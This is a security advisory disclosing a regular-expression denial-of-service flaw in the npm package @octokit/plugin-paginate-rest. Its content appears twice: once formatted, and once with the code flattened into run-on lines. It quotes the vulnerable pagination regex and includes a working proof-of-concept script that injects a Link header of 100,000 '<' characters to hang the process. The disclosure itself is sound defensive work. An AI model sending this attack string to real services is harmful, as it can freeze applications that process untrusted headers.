Headline
GHSA-h5c3-5r3r-rr8q: @octokit/plugin-paginate-rest has a Regular Expression in iterator Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
Summary
For the npm package @octokit/plugin-paginate-rest, when calling octokit.paginate.iterator(), a specially crafted octokit instance—particularly with a malicious link parameter in the headers section of the request—can trigger a ReDoS attack.
Details
The issue occurs at line 39 of iterator.ts in the @octokit/plugin-paginate-rest repository. The relevant code is as follows:
url = ((normalizedResponse.headers.link || "").match(
/<([^>]+)>;\s*rel="next"/,
) || [])[1];
The regular expression /<([^>]+)>;\s*rel="next"/ may lead to a potential backtracking vulnerability, resulting in a ReDoS (Regular Expression Denial of Service) attack. This could cause high CPU utilization and even service slowdowns or freezes when processing specially crafted Link headers.
PoC
- run npm i @octokit/plugin-paginate-rest
- run ‘node poc.js’ result:
- then the program will stuck forever with high CPU usage
import { Octokit } from "@octokit/core";
import { paginateRest } from "@octokit/plugin-paginate-rest";
const MyOctokit = Octokit.plugin(paginateRest);
const octokit = new MyOctokit({
auth: "your-github-token",
});
// Intercept the request to inject a malicious 'link' header for ReDoS
octokit.hook.wrap("request", async (request, options) => {
const maliciousLinkHeader = "" + "<".repeat(100000) + ">"; // attack string
return {
data: [],
headers: {
link: maliciousLinkHeader, // Inject malicious 'link' header
},
};
});
// Trigger the ReDoS attack by paginating through GitHub issues
(async () => {
try {
for await (const normalizedResponse of octokit.paginate.iterator(
"GET /repos/{owner}/{repo}/issues", { owner: "DayShift", repo: "ReDos", per_page: 100 }
)) {
console.log({ normalizedResponse });
}
} catch (error) {
console.error("Error encountered:", error);
}
})();
Impact
What kind of vulnerability is it?
This is a Regular Expression Denial of Service (ReDoS) vulnerability, which occurs due to excessive backtracking in the regex pattern:
/<([^>]+)>;\s*rel="next"/
When processing a specially crafted Link header, this regex can cause significant performance degradation, leading to high CPU utilization and potential service unresponsiveness.
Who is impacted?
- Users of
@octokit/plugin-paginate-restwho calloctokit.paginate.iterator()and process untrusted or manipulatedLinkheaders. - Applications relying on Octokit’s pagination mechanism, particularly those handling large volumes of API requests.
- GitHub API consumers who integrate this package into their projects for paginated data retrieval.
Summary
For the npm package @octokit/plugin-paginate-rest, when calling octokit.paginate.iterator(), a specially crafted octokit instance—particularly with a malicious link parameter in the headers section of the request—can trigger a ReDoS attack.
Details
The issue occurs at line 39 of iterator.ts in the @octokit/plugin-paginate-rest repository. The relevant code is as follows:
url = ((normalizedResponse.headers.link || “”).match( /<([^>]+)>;\s*rel="next"/, ) || [])[1];
The regular expression /<([^>]+)>;\s*rel="next"/ may lead to a potential backtracking vulnerability, resulting in a ReDoS (Regular Expression Denial of Service) attack. This could cause high CPU utilization and even service slowdowns or freezes when processing specially crafted Link headers.
PoC
The gist of PoC.js
- run npm i @octokit/plugin-paginate-rest
- run ‘node poc.js’
result: - then the program will stuck forever with high CPU usage
import { Octokit } from "@octokit/core"; import { paginateRest } from "@octokit/plugin-paginate-rest";
const MyOctokit = Octokit.plugin(paginateRest); const octokit = new MyOctokit({ auth: "your-github-token", });
// Intercept the request to inject a malicious ‘link’ header for ReDoS octokit.hook.wrap("request", async (request, options) => { const maliciousLinkHeader = “” + "<".repeat(100000) + ">"; // attack string return { data: [], headers: { link: maliciousLinkHeader, // Inject malicious ‘link’ header }, }; });
// Trigger the ReDoS attack by paginating through GitHub issues (async () => { try { for await (const normalizedResponse of octokit.paginate.iterator( "GET /repos/{owner}/{repo}/issues", { owner: "DayShift", repo: "ReDos", per_page: 100 } )) { console.log({ normalizedResponse }); } } catch (error) { console.error("Error encountered:", error); } })();
Impact****What kind of vulnerability is it?
This is a Regular Expression Denial of Service (ReDoS) vulnerability, which occurs due to excessive backtracking in the regex pattern:
/<([^>]+)>;\s*rel="next"/
When processing a specially crafted Link header, this regex can cause significant performance degradation, leading to high CPU utilization and potential service unresponsiveness.
Who is impacted?
- Users of @octokit/plugin-paginate-rest who call octokit.paginate.iterator() and process untrusted or manipulated Link headers.
- Applications relying on Octokit’s pagination mechanism, particularly those handling large volumes of API requests.
- GitHub API consumers who integrate this package into their projects for paginated data retrieval.
References
- GHSA-h5c3-5r3r-rr8q
- octokit/plugin-paginate-rest.js@bb6c4f9